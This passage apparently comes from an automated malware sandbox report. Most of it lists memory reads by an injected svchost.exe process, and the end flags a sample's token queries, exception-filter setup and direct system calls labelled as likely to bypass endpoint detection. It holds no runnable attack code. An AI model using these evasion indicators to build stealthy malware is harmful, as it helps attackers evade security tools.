Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]	2_2_039C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]	2_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]	2_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]	2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]	2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]	2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]	2_2_039EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]	2_2_039644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_039BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]	2_2_039364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]	2_2_039304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]	2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]	2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]	2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]	2_2_0396A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]	2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]	2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]	2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]	2_2_0392C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]	2_2_039EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]	2_2_0392645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]	2_2_0395245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]	2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]	2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]	2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]	2_2_039BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]	2_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]	2_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_039DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]	2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]	2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]	2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]	2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]	2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]	2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]	2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]	2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]	2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]	2_2_0395EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_039BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]	2_2_03A04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]	2_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]	2_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]	2_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]	2_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]	2_2_03928B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]	2_2_039DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]	2_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]	2_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]	2_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]	2_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]	2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]	2_2_039D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]	2_2_0392CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]	2_2_03968A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]	2_2_03A04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]	2_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]	2_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]	2_2_03986AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]	2_2_03930AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]	2_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]	2_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]	2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]	2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]	2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]	2_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]	2_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]	2_2_039BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]	2_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]	2_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]	2_2_0396CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]	2_2_0396CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]	2_2_0395EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]	2_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]	2_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]	2_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]	2_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]	2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]	2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]	2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]	2_2_039DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]	2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]	2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]	2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]	2_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]	2_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]	2_2_039649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_039FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]	2_2_039C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]	2_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]	2_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_039BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]	2_2_039BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]	2_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]	2_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]	2_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]	2_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]	2_2_039B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]	2_2_039C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]	2_2_039B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]	2_2_03A04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]	2_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]	2_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]	2_2_039BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]	2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]	2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]	2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]	2_2_039BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]	2_2_03930887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0395E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]	2_2_03A008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_039FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]	2_2_039BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00C680A9

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00C3A155
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C3A124 SetUnhandledExceptionFilter,		0_2_00C3A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
